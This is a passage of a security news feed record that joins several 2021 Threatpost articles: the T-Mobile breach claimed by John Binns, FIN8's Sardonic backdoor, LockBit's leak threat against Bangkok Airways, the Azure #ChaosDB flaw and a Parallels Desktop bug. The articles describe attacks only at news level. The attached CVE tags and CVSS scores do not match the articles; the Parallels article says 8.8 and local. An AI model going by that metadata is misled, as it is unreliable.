outlet has confirmed that his name is John Binns: a 21-year-old US citizen of Turkish descent who moved to Turkey a few years ago. 
Binns reportedly discussed details about the breach before they were widely known.\n\nThe WSJ noted that T-Mobile was initially notified of the breach by a cybersecurity company called [Unit221B LLC](<https://unit221b.com/>), which said that the telecom\u2019s customer data was being peddled on the dark web.\n\n## Who is John Binns?\n\nBinns told the WSJ that he conducted the attack from his home in Izmir, Turkey, where he lives with his mother. His father, who died when he was two, was American, while his mother is Turkish. They moved back to Turkey when Binns was 18.\n\nIf the name rings a bell, it\u2019s because the seller told Alon Gal, CTO of cybercrime intelligence firm [Hudson Rock](<https://www.hudsonrock.com/>), that this sucker-punch to US infrastructure was done in retaliation against the US for the kidnapping and torture of John Binns at the hands of CIA and Turkish intelligence agents in 2019, as Gal tweeted at the time (from an account that has since been suspended).\n\n> This breach was done to retaliate against the US for the kidnapping and torture of John Erin Binns (CIA Raven-1) in Germany by CIA and Turkish intelligence agents in 2019. We did it to harm US infrastructure. \u2014Attacker\u2019s alleged statement to Gal\n\nIt\u2019s not clear who \u201cwe\u201d refers to, but Binns said he needed help. In his conversation with the WSJ, Binns described the attack as a \u201ccollaborative effort to find the login credentials needed to crack T-Mobile\u2019s internal databases,\u201d and that another online actor offered, in online forums, to sell some of the stolen T-Mobile data.\n\nBinns [sued](<https://casetext.com/case/binns-v-cent-intelligence-agency>) the FBI, CIA and Department of Justice in 2020, alleging that he was tortured and harassed by the US and Turkish governments and is seeking to compel the US to release documents regarding these activities under the Freedom of Information Act. 
He told the WSJ that the kidnapping story is legitimate \u2013 why would he lie?:\n\n> I have no reason to make up a fake kidnapping story and I\u2019m hoping that someone within the FBI leaks information about that. \u2014John Binns, as quoted by the WSJ\n\nBinns reportedly uses the online handles IRDev and v0rtex, among others. He\u2019s apparently got a track record that includes \u201cperipheral involvement\u201d in the creation of a [massive botnet](<https://www.wsj.com/articles/web-attack-stemmed-from-game-tactics-1477256958?mod=article_inline>) of compromised devices that was used for online attacks four years ago, having been in cahoots with the gamers who infected devices around the world.\n\nThese botnets are often used by gamers to knock people and websites offline in distributed denial-of-service (DDoS) attacks. The [pandemic caused a surge](<https://threatpost.com/ddos-attacks-skyrocket-pandemic/159301/>) in such attacks: As of September 2020, more people were online during lockdowns and work-from-home shifts, making for lucrative pickings for DDoS-ers.\n\n## T-Mobile\u2019s \u2018Awful\u2019 Security\n\nBinns told the WSJ that he penetrated T-Mobile\u2019s defenses in July after scanning the company\u2019s known internet addresses, looking for weak spots and using what the publication called \u201ca simple tool available to the public.\u201d (That tool well might have been Shodan: a search engine used to uncover servers connected to the internet that\u2019s often used by threat actors and researchers to find vulnerabilities.)\n\nHe found an unprotected, exposed router last month, he told the Journal. From there, Binns said he managed to break into T-Mobile\u2019s data center outside East Wenatchee, Wash., where he reportedly accessed more than 100 servers that contained the personal data of millions. By Aug. 
4, he had stolen millions of files thanks to what he told the Journal was the mobile phone seller\u2019s pathetic security:\n\n> I was panicking because I had access to something big. Their security is awful. \u2014John Binns, as quoted by the WSJ\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27170759/T-Mobile-screen-capture-e1630098497960.png>)\n\nBinns shared this screenshot of internal T-Mobile servers that displayed warnings against unauthorized access. \nSource: WSJ.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27171327/personal-T-Mobile-customer-data.png>)\n\nTables of personal information that Binns told the WSJ that he found in T-Mobile\u2019s internal systems. Source: WSJ.\n\nCybersecurity experts have been nodding vigorously, albeit in more diplomatic terms than \u201cawful.\u201d The Journal spoke with Glenn Gerstell, a former general counsel for the National Security Agency, who said that the fact that the theft included records stolen from prospective clients or former, long-gone customers shows that somebody or somebodies at T-Mobile isn\u2019t practicing good data management hygiene: \u201cThat to me does not sound like good data management practices,\u201d he was quoted as saying.\n\nGranted, that work gets harder all the time. Randy Watkins, chief technology officer at cybersecurity consulting and managed detection and response (MDR) services company CRITICALSTART, told Threatpost on Friday that the attack shows how difficult it is to secure growing perimeters and how tough it is to monitor attack surfaces.\n\nWatkins warned that alerts set off by an intruder\u2019s activity \u2013 including initial compromise, subsequent lateral movement and data exfiltration\u2013 are dismissed at an organization\u2019s peril: \u201cEven if this generated alerts, they would likely be low-priority, and something that would be disregarded as a likely false-positive,\u201d he said via email. 
“As attackers take advantage of these less-obvious tactics, it is becoming more critical to resolve every alert generated by detection toolsets.”

## Something’s Wrong in Magenta Land

By some accounts, this is the sixth time that T-Mobile has been attacked in recent years.

The US Federal Communications Commission (FCC) said last week that it’s [investigating this most recent breach](<https://www.reuters.com/technology/hackers-steal-some-personal-data-about-78-mln-t-mobile-customers-2021-08-18/>). T-Mobile is also facing at least two [class-action lawsuits](<https://www.q13fox.com/news/t-mobile-hit-with-class-action-lawsuits-over-data-breach>) accusing the company, the second-largest US wireless carrier, of failing to protect customer data.

T-Mobile was [attacked](<https://www.engadget.com/t-mobile-data-breach-security-phone-number-hack-2020-172117333.html>) [twice](<https://www.complianceweek.com/cyber-security/t-mobile-data-breach-a-cautionary-tale-for-all-companies/28568.article>) last year, and in 2018, about 2.5 million customers had their data exposed in a network breach. That attack also became part of a federal class-action lawsuit.

The most recent theft involved the records of more than 13 million current customers, more than 40 million prospective customers who had applied for credit with the company, and 667,000 former customers, T-Mobile said last week. An additional 902,000 prepaid customers also had some data exposed.

Some records contained Social Security numbers, phone numbers, names, security PINs, physical addresses, unique IMEI numbers, IMSI numbers, driver’s license numbers and dates of birth: in short, all the ingredients necessary for [identity theft](<https://threatpost.com/identity-theft-spikes-covid-19-relief/163577/>).

A source familiar with the investigation told the WSJ that the Seattle office of the FBI is investigating.

## The Latest From T-Mobile

On Friday, T-Mobile’s CEO, Mike Sievert, announced that the company has sought help on the cybersecurity front. He said in a [statement](<https://www.t-mobile.com/news/network/cyberattack-against-tmobile-and-our-customers>) that the company has entered into long-term partnerships with Mandiant and with consulting firm KPMG LLP.

“We know we need additional expertise to take our cybersecurity efforts to the next level – and we’ve brought in the help,” Sievert said. “These arrangements are part of a substantial multi-year investment to adopt best-in-class practices and transform our approach. This is all about assembling the firepower we need to improve our ability to fight back against criminals and building a future-forward strategy to protect T-Mobile and our customers.”

With regard to the details behind the attack, Sievert painted this as the work of an erudite threat actor. “What we can share is that, in simplest terms, the bad actor leveraged their knowledge of technical systems, along with specialized tools and capabilities, to gain access to our testing environments and then used brute force attacks and other methods to make their way into other IT servers that included customer data,” he was quoted as saying in Friday’s statement.

Security experts weren’t too sure about T-Mobile’s characterization of this as a fancy attack.

## Well, Good Luck With All That

Some security experts said that the move to pull in the security big guns is a good step, but T-Mobile’s got a lot of gunk to scrape out, and it won’t happen overnight. Ian McShane, Field CTO of security firm Arctic Wolf and former Gartner analyst, told Threatpost that, given how many breaches T-Mobile has suffered over the last few years, he’s already skeptical about the company’s claims that the breach was a “highly sophisticated” attack. “I’m sure many others in our industry will be just as keen as I am to understand the cause and the lessons learned, especially as it seems the internal investigation was only sparked by posts from a Twitter account with what appeared to be inside knowledge,” he said.

Mark Manglicmot, vice president of security services at Arctic Wolf, told Threatpost that one of the poor practices brought to light by the breach is storing Social Security numbers in plain text. “Encryption of this data is a mandatory part of the security equation,” he pointed out.

Moreover, since this is T-Mobile’s sixth such breach in a few years, it’s apparent “they haven’t taken security seriously enough,” Manglicmot continued. “Their IT asset management and patching of systems is poor. The combination of poor defenses and a lack of capable real-time detection and response is a recipe for this type of data theft disaster. Once a data-rich company like T-Mobile experiences a breach, the floodgates open to other attackers to find additional cracks. Reports are stating their security is a mess. It’s a good step that they are bringing in reputable help to investigate and bolster defenses, but it’s going to take T-Mobile years to fully get their security program on par with their responsibility to customers.”

Then too, there’s that throbbing sore thumb: namely, the exposed router. Agio founder and CEO Bart McDonough pointed out to Threatpost that the unsecured router that Binns claimed to have exploited “appears to have had a different configuration than other routers. The hacker exploited the weakness in this non-standard configuration.” T-Mobile should have had an AI-based anomaly detection system in place, he said: one that might have caught the aberrant login and resulting data exfiltration, “allowing T-Mobile to perhaps minimize the damage from this attack.”

Many businesses aren’t as complex as T-Mobile; nor do they get targeted with such intensity. Still, there are lessons to be learned for other businesses, McDonough observed. “All businesses could benefit from enhancing their cybersecurity fundamentals. Specifically, deploying device configuration management, access management, and AI-based detection of anomalous and suspicious network activity.”

As it is, many, if not most, organizations only have a static awareness of their “surface”, e.g. internal systems exposed to the Internet, he continued. “When an administrator makes a change (or mistake) the new exposure point should set off alarms and someone should be asking the question ‘is that system, router, etc. presenting what we are intending?’”

_Published 2021-08-28T16:58:45 on [Threatpost](<https://threatpost.com/t-mobile-security-awful-thief/169011/>) as “T-Mobile’s Security Is ‘Awful,’ Says Purported Thief”. Related CVE in this feed: CVE-2021-33766._

# FIN8 Targets US Bank With New ‘Sardonic’ Backdoor

_Published 2021-08-27T17:32:56 on [Threatpost](<https://threatpost.com/fin8-bank-sardonic-backdoor/168982/>). Related CVE in this feed: CVE-2021-33766._

The financially motivated FIN8 cybergang used a brand-new backdoor – dubbed Sardonic by the Bitdefender researchers who first spotted it – in attempted (but unsuccessful) breaches of networks belonging to two unidentified U.S.
financial organizations.

It’s a nimble newcomer, researchers wrote: “The Sardonic backdoor is extremely potent and has a wide range of capabilities that help the threat actor leverage new malware on the fly without updating components,” according to Bitdefender’s report.

[FIN8](<https://malpedia.caad.fkie.fraunhofer.de/actor/fin8>) has typically gone after financial services and payment-card data from [point-of-sale (PoS) systems](<https://threatpost.com/fin8-targets-card-data-fuel-pumps/151105/>), particularly those of retailers, restaurants and [the hotel industry](<https://www.bankinfosecurity.com/fin8-group-returns-targeting-pos-devices-new-tools-a-12819>). It’s been active since at least [January 2016](<https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html>), but it periodically pops in and out of dormancy in order to fine-tune tactics, techniques and procedures (TTPs) and thereby evade detection and ramp up its success rate.

True to form, in March, Bitdefender spotted FIN8 re-emerging after a period of relative quiet with a [new version of the BadHatch backdoor](<https://threatpost.com/fin8-resurfaces-backdoor-malware/164684/>) to compromise companies in the chemical, insurance, retail and technology industries. Sardonic is an updated version of BadHatch that’s apparently still under development, Bitdefender said.

It’s a refinement of BadHatch in that it can be automatically boosted with new functionality without the malware needing to be redeployed, a way to make it more agile, Bitdefender said.

Bogdan Botezatu, director of threat research for Bitdefender, told [BankInfoSecurity](<https://www.bankinfosecurity.com/fin8-using-updated-backdoor-a-17381>) that the security firm has seen FIN8 carrying out two attacks over the past few months, what he called “unusually high activity for a threat actor that used to take long breaks between attacks.”

Besides BadHatch – a backdoor that provides file transfer and reverse-shell functionality – FIN8’s well-stocked [arsenal](<https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/>) has included [malware variants](<https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/>) such as ShellTea, a backdoor also known as [PunchBuggy](<https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html>), and the memory-scraper tool [PoSlurp/PunchTrack](<https://otx.alienvault.com/pulse/594821fe9cf28a6bee21691d/>). FIN8 has also used the TTPs of exploiting [Windows zero-days](<https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html>) and [spear-phishing](<https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/>).

Bitdefender isn’t sure what the initial infection vector was in the thwarted bank attack, but based on [FIN8’s prior attacks](<https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf>), it was likely via social engineering and spear-phishing campaigns.

[FIN8 attack anatomy](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27123110/FIN8-attack-anatomy-e1630081924586.png>). Source: Bitdefender.

## Sardonic Still Being Refined

And now, there’s Sardonic. Earlier this week, Bitdefender published a [deep dive](<https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation>) describing a forensic investigation that led to the discovery of the new backdoor. Artifacts led researchers to conclude that the threat actors use that name to describe “an entire project including the backdoor itself, the loader and some additional scripts,” according to Bitdefender.

Sardonic is apparently still under development, and Bitdefender suspects that the threat actors will be releasing additional updates.

[The evolution of BadHatch](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27131258/evolution-of-badhatch-e1630084389237.jpeg>). Source: Bitdefender.

## The Two Attacks

During one of the attacks – a recent attack against an unidentified financial institution in the U.S. – FIN8 used a three-stage process to deploy and execute the Sardonic backdoor: a PowerShell script, a .NET loader and downloader shellcode.

After it was loaded, Bitdefender said, the embedded dynamic link library obtained the value of the Y1US environment variable and extracted from it the string containing options for customizing the backdoor’s behavior.

Bitdefender said that the new backdoor tried to evade security monitoring by using TLS encryption to conceal PowerShell commands. After gaining network access, FIN8 has used that access to scan victim networks, give attackers remote access, install a backdoor and deliver other malware payloads.

## Fending Off Financial Malware

Bitdefender recommends that companies in the targeted verticals – retail, hospitality and finance – check for potential compromise by applying the indicators of compromise (IoCs) listed in its whitepaper ([PDF](<https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf>)), and by implementing endpoint detection and response (EDR), extended detection and response (XDR) and other security defenses.

Bitdefender offered these protective measures:

 * Separate the PoS network from the ones used by employees or guests.
 * Introduce cybersecurity awareness training for employees to help them spot phishing e-mails.
 * Tune your e-mail security solution to automatically discard malicious or suspicious attachments.
 * Integrate threat intelligence into existing SIEM or security controls for relevant indicators of compromise.

# LockBit Gang to Publish 103GB of Bangkok Airways Customer Data

_Published 2021-08-30T15:14:21 on [Threatpost](<https://threatpost.com/lockbit-bangkok-airways-breach/169019/>). Related CVE in this feed: CVE-2021-33766._

The LockBit ransomware gang has apparently struck again, having purportedly stolen 103GB worth of files from Bangkok Airways and promising to release them tomorrow, on Tuesday.

A Dark Web intelligence firm calling itself DarkTracer (apparently a separate intel firm from the better-known Darktrace) tweeted a screen capture of a countdown clock from LockBit 2.0 that, as of Friday, showed four and a half days left. “LockBit ransomware gang has announced Bangkok Airways on the victim list,” DarkTracer [tweeted](<https://twitter.com/darktracer_int/status/1430494830560309249>). “It announced that 103GB of compressed files will be released.”

> [ALERT] LockBit ransomware gang has announced Bangkok Airways on the victim list.
> It announced that 103GB of compressed files will be released. [pic.twitter.com/LT2C0Eixxn](<https://t.co/LT2C0Eixxn>)
>
> — DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [August 25, 2021](<https://twitter.com/darktracer_int/status/1430494830560309249?ref_src=twsrc%5Etfw>)

A day earlier, on Thursday, Bangkok Airways publicly [acknowledged](<https://www.bangkokair.com/press-release/view/clarifies-the-incident-of-a-cybersecurity-attack>) that it had been hit with a cyberattack a week ago, on Monday, Aug. 23. It’s still investigating the incident “as a matter of urgency,” the company said in a press release, and is working on beefing up its defenses.

> “Upon such discovery, the company immediately took action to investigate and contain the event, with the assistance of a cybersecurity team. Currently, the company is investigating, as a matter of urgency, to verify the compromised data and the affected passengers as well as taking relevant measures to strengthen its IT system.” —Bangkok Airways press release

So far, it looks like the affected personal data belonging to passengers includes:

 * Passenger name
 * Family name
 * Nationality
 * Gender
 * Phone number
 * Email address
 * Other contact information
 * Passport information
 * Historical travel information
 * Partial credit-card information
 * Special meal information

The attackers evidently didn’t manage to access Bangkok Airways’ operational or aeronautical security systems, the company said. The company apologized, saying that “Bangkok Airways Public Company Limited takes the protection of passenger’s data very seriously and the airline is deeply sorry for the worry and inconvenience that this malicious incident has caused.”

The airline said that it has notified the proper authorities, including the Royal Thai police.

## LockBit 2.0

LockBit 2.0 is similar to its ransomware-as-a-service (RaaS) brethren DarkSide and REvil: Like those other operations, LockBit uses an affiliate model to rent out its ransomware platform, taking a cut of any ransom payments that result.

The gang went on a hiring spree in the wake of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [REvil](<https://threatpost.com/whats-next-revil-victims/167926/>) both shutting down operations, putting up wallpaper on compromised systems that includes text [inviting insiders to help](<https://threatpost.com/lockbit-ransomware-proliferates-globally/168746/>) compromise systems and promising payouts of millions of dollars.

Earlier this month, [LockBit attacked Accenture](<https://threatpost.com/accenture-lockbit-ransomware-attack/168594/>), a global business consulting firm with an inside track on some of the world’s biggest, most powerful companies.

At the time, Cyble researchers suggested in a [Tweet stream](<https://twitter.com/AuCyble/status/1425422006690881541>) that the Accenture attack could have been an insider job. “We know #LockBit #threatactor has been hiring corporate employees to gain access to their targets’ networks,” they tweeted, along with a clock counting down how much time was left for Accenture to cough up the ransom.

According to [a report](<https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html>) released two weeks ago by Trend Micro, attacks in July and August have employed LockBit 2.0 ransomware that features a [souped-up encryption method](<https://threatpost.com/lockbit-ransomware-proliferates-globally/168746/>).

Threatpost has reached out to DarkTracer for more details and an update, and has reached out to Darktrace to find out more about its near-namesake. We also reached out to Bangkok Airways for more details, including whether a ransom has been demanded, whether the company has figured out how many customers were affected by the breach and whether it plans to offer identity-theft protection.

## Watch Out for Phishing Attempts

Bangkok Airways recommends that passengers contact their bank or credit-card provider and change any compromised passwords ASAP. It also recommended that passengers keep an eye out for suspicious or unsolicited calls and/or emails – particularly phishing attempts claiming to come from Bangkok Airways that try to gather personal data.

Bangkok Airways won’t be contacting customers to ask for payment-card details or the like, it said. If passengers experience such phishing attempts, Bangkok Airways said that they should report it to law enforcement and to the airline, at:

 * Toll-free number 1-800-010-171 (within Thailand) between 8 a.m. and 5:30 p.m. (Thai local time)
 * Toll number 800-8100-6688 (overseas) between 8 a.m. and 5:30 p.m. (Thai local time)
 * Email: infosecurity@bangkokair.com

## Step Numero Uno: IDing Point of Entry

Quentin Rhoads-Herrera, director of professional services at managed detection and response (MDR) services provider CRITICALSTART, observed that Bangkok Airways has a tall order ahead of it when it comes to notifying affected customers in several different countries. Just one complication is the fact that it entails different regulatory bodies overseeing various regulations – the General Data Protection Regulation [(GDPR) rules](<https://threatpost.com/data-leak-gdpr-advice-site/155199/>), for example.

“The primary thing Bangkok Air needs to do is identify the point of entry used by LockBit,” Rhoads-Herrera observed to Threatpost on Monday. “If LockBit group was able to gain entry due to an unpatched externally facing system, then not only do they need to evaluate their current external exposure, but they also need to improve their overall asset inventory and patch management processes to ensure systems are updated often. Understanding the way the criminals initially gained entry is pivotal to ensuring this doesn’t occur in the future.”

He stressed that Bangkok Air also needs to understand everything LockBit did once on the inside to ensure that it hardens its defenses and alerts on similar future activities. “With enough determination, any criminal can breach a company,” Rhoads-Herrera commented via email. “This is why it is very important that organizations work to lower their time to detect and respond as much as possible to limit the damage of such a breach.”

He also noted that – assuming that this was a ransomware strike – the fact that it’s coupled with a threat to disclose data makes it a [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) attack, in which the injury of paralyzed systems is compounded by the misery of threatened information disclosure.

All the more reason to test backup infrastructure, he noted: “It’s very important that organizations not only protect their backup infrastructure so they can recover after a breach but also protect their most important data and alert on large data leaving their infrastructure. In this instance, the data LockBit has obtained can be used to extort Bangkok Airways for additional cryptocurrency or they can release it as a way to damage the brand of Bangkok Airways at the same time of receiving notoriety as a criminal organization.”

083021 15:41 UPDATE: Added input from Quentin Rhoads-Herrera.

# Critical Azure Cosmos DB Bug Allows Full Cloud Account Takeover

_Published 2021-08-27T16:49:23 on [Threatpost](<https://threatpost.com/azure-cosmos-db-bug-cloud/168986/>). Related CVE in this feed: CVE-2021-33766._

A critical security vulnerability in Microsoft’s Azure cloud database platform – Cosmos DB – could have allowed full remote takeover of accounts, with admin rights to read, write and delete any information in a database instance.

According to researchers at Wiz, any Azure customer could access another customer’s account, without authentication.
The bug, dubbed #ChaosDB, could be trivially exploited, and “impacts thousands of organizations, including numerous Fortune 500 companies,” according to researchers.

Microsoft disabled the buggy component after being alerted to it by Wiz and notified more than 30 percent of Cosmos DB customers about the issue, but “we believe the actual number of customers affected by #ChaosDB is higher,” according to a [Wiz writeup](<https://chaosdb.wiz.io/>), published on Thursday.

The firm added that any prior exploitation is unknown, and that “the vulnerability has been exploitable for months and every Cosmos DB customer should assume they’ve been exposed.”

Incidentally, the issue has no CVE because [cloud bugs](<https://threatpost.com/azure-functions-privilege-escalation/165307/>) aren’t designated within that system, researchers added.

## **Scant Bug Details for #ChaosDB**

The issue exists in the Jupyter Notebook feature of Cosmos DB, according to the analysis. Jupyter Notebook is an open-source web application that allows users to create and share documents that contain live code, equations, visualizations and narrative text.

“Azure Cosmos DB built-in Jupyter Notebooks are directly integrated into the Azure portal and your Azure Cosmos DB accounts, making them convenient and easy to use,” according to Microsoft’s [documentation](<https://docs.microsoft.com/en-us/azure/cosmos-db/cosmosdb-jupyter-notebooks>). “Developers, data scientists, engineers and analysts can use the familiar Jupyter Notebooks experience to do data exploration, data cleaning, data transformations, numerical simulations, statistical modeling, data visualization and machine learning.”

However, Wiz researchers found that by querying information about a target Cosmos DB Jupyter Notebook, it’s possible to obtain credentials not just for the Jupyter Notebook compute instance and the Jupyter Notebook storage account of another user, but also for the Cosmos DB account itself, including the account’s primary read-write key used to encrypt it.

“Using these credentials, it is possible to view, modify and delete data in the target Cosmos DB account via multiple channels,” according to Wiz.

The company isn’t providing further technical details beyond the fact that #ChaosDB is actually a string of vulnerabilities that can be chained together, but it did provide an attack diagram, and it also released a video demonstrating a proof-of-concept exploit.

## **How to Protect Against #ChaosDB Cyberattacks**

To mitigate the risk, Microsoft has advised customers to regenerate the Cosmos DB primary keys “out of an abundance of caution.” The steps for doing so [can be found here](<https://docs.microsoft.com/en-us/azure/cosmos-db/secure-access-to-data?tabs=using-primary-key#primary-keys>).

The computing giant also noted that Azure Cosmos DB accounts with a vNET or that are firewall-enabled are protected by additional security mechanisms that prevent the risk of unauthorized access.

Wiz researchers, who earned a $40,000 bug bounty for finding the issue, added that all users should review all past activity in their Cosmos DB accounts.

No in-the-wild exploitation has been noticed as of yet.

“We have no indication that external entities outside the researcher had access to the primary read-write key associated with your Azure Cosmos DB account(s),” Microsoft said. “In addition, we are not aware of any data access because of this vulnerability.”

The maker of Parallels Desktop has released a workaround fix for a high-severity privilege-escalation bug that impacts its Parallels Desktop 16 for Mac software and all older versions.
Mitigation advice comes five months after researchers first identified the bug in April.\n\nParallels Desktop, now owned by private equity giant KKR, is used by seven million users, according to the company, and allows Mac users to run Windows, Linux and other operating systems on their macOS.\n\nThe vulnerability allows malicious software running in a Parallels virtual machine (VM) to access macOS files shared in a default configuration of the software. The software maker stated that the recommended fixes need to be manually performed by end users and will likely \u201cinconvenience\u201d some while also reducing product functionality.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn a [Wednesday security bulletin](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208188>), first to widely disclose details of the bug, it was revealed that the vulnerability (CVE-2021-34864) is caused by improper access control in the Parallels\u2019 WinAppHelper component. The flaw, according to Parallels, is specifically tied to the software\u2019s [Parallels Tools](<https://www.parallels.com/blogs/parallels-tools/>), a proxy for communications between the host macOS and the virtual machine\u2019s operating system.\n\n## An Easy-to-Exploit Bug\n\n\u201cThe issue results from the lack of proper access control. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor,\u201d according to a separate security [advisory, also posted Wednesday](<https://www.zerodayinitiative.com/advisories/ZDI-21-1000/>).\n\nThe severity of the vulnerability is rated as high (8.8) using the Common Vulnerability Scoring System, version 3.0. 
The bulletin also warns that the level of complexity needed to exploit the vulnerability is \u201clow.\u201d\n\n\u201cBy default, Parallels Desktop shares files and folders between the Mac and a VM, so users can easily open macOS files from applications running in a virtual machine and save documents to Mac,\u201d Parallels explained. \u201cThis functionality exposes the user home folder to the VM. This folder may contain configuration files, cache from different applications, etc., that malicious software can access.\u201d\n\nParallels is advising users to mitigate the vulnerability via reconfiguring their software or upgrading to the latest version, which is Parallels Desktop 17 for Mac, released on August 10.\n\n\u201cParallels Desktop 17 for Mac and newer versions are not affected. The entire home folder is no longer shared with a VM by default, only selected folders, like Desktop, Documents, Downloads, etc.,\u201d according to the [vulnerability\u2019s summary description](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-34864>).\n\nThe company added, \u201cThis vulnerability allows local malicious users to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability.\u201d\n\n## **Disclosure Timeline **\n\nThe flaw was initially detected by security researchers Sunjoo Park and Jack Dates on April 8, during Trend Micro\u2019s Pawn2Own Austin event. For their efforts, the researchers earned $40,000 each, according to the event\u2019s organizer.\n\nOn August 10, Parallels posted to its Knowledge Base information regarding the flaw, under the title \u201cMitigate ZDI-CAN-13543 in Parallels Desktop 16 and older\u201d. The post described the April discovery and mitigation steps users needed to take to protect themselves. 
On Wednesday, a number of security alerts posted the vulnerability\u2019s identifying number (CVE-2021-34864), assigning it a high-severity rating.\n\nThe prospect of malicious software or a threat actor breaking out of, or escaping, a virtual instance of Windows to infect a system is a worst-case scenario. Parallels did not return requests for comment for this report.\n\n## **Parallels: An Inconvenient Fix**\n\nTo mitigate the vulnerability, Parallels Desktop 16 for Mac users (and other legacy users) have a number of options. The first option is to upgrade to Parallels Desktop 17 for Mac, which does not contain the flaw. It\u2019s unclear if affected customers will have to pay the $50 one-time upgrade fee for the Standard Edition to mitigate the flaw via an upgrade.\n\nFor customers running Parallels Desktop 16 or earlier versions of the software, the company said the fixes available to them will \u201creduce functionality\u201d of the software and cause \u201cinconveniences,\u201d such as file duplication when sharing documents between the VM and the host macOS.\n\n\u201cIf you don\u2019t plan to run untrusted code in the VM, it is recommended to follow common security practices,\u201d the company recommended. \u201cIf you run untrusted code in the VM and you want to isolate the VM from Mac, then one of the following options can be used.\u201d\n\nThose options, according to Parallels, include:\n\n 1. _Disable shared folders as described in [KB 6912](<https://kb.parallels.com/6912#section4>). Shared Profile functionality will be disabled as well, and you will no longer be able to open Mac files in the VM or save files to Mac. Learn more in [KB 6912](<https://kb.parallels.com/6912>)._\n 2. _Alternatively, isolate the VM from Mac as described in [KB 112942](<https://kb.parallels.com/112942>). After isolating, folders, files, applications, and external drives are not shared between two operating systems. 
In general, it becomes impossible for a VM to access any information on your Mac. Isolating a virtual machine provides the highest level of security._\n\nWhile the above mitigates the security issue, it also eliminates one of [Parallels\u2019 selling points](<https://www.parallels.com/products/desktop/>): \u201cSeamlessly move and share content between Mac and Windows.\u201d\n\nIt\u2019s also unclear whether macOS users who configure their systems to isolate the VM guest from the host operating system mitigate the flaw.\n\n## **Researchers Turn to Parallels**\n\nWhile Parallels Desktop for Mac is not marketed as a cybersecurity research tool, a [number of websites recommend this type of use scenario](<https://www.sentinelone.com/blog/how-to-reverse-macos-malware-part-one/>).\n\nParallels is just one of many virtual machine options for macOS users to run alternate operating systems. Others include Apple\u2019s own Boot Camp feature, VirtualBox and VMware for macOS.\n\nInterest in Parallels has recently increased because Boot Camp has been removed from Apple\u2019s new ARM-based Macs, which contain its security-forward M1 chip. 
Installing Windows 10 on M1 Macs requires an ARM copy of Microsoft\u2019s operating system.\n\nCraig Federighi, Apple\u2019s senior vice president of software engineering, said during a [Daring Fireball podcast](<https://youtu.be/Hg9F1Qjv3iU>) that Apple is not planning to support Boot Camp on ARM-based Macs in the future.\n\nSeeing an opportunity, on April 14 [Parallels released an update](<https://www.parallels.com/blogs/parallels-desktop-apple-silicon-mac/>) for Parallels Desktop 16 for Mac that supports Mac computers with the Apple M1 chip.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T20:54:13", "type": "threatpost", "title": "Parallels Offers \u2018Inconvenient\u2019 Fix for High-Severity Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34864"], "modified": "2021-08-27T20:54:13", "id": "THREATPOST:95C995B2005CA3F4467BC3C69862415E", "href": 
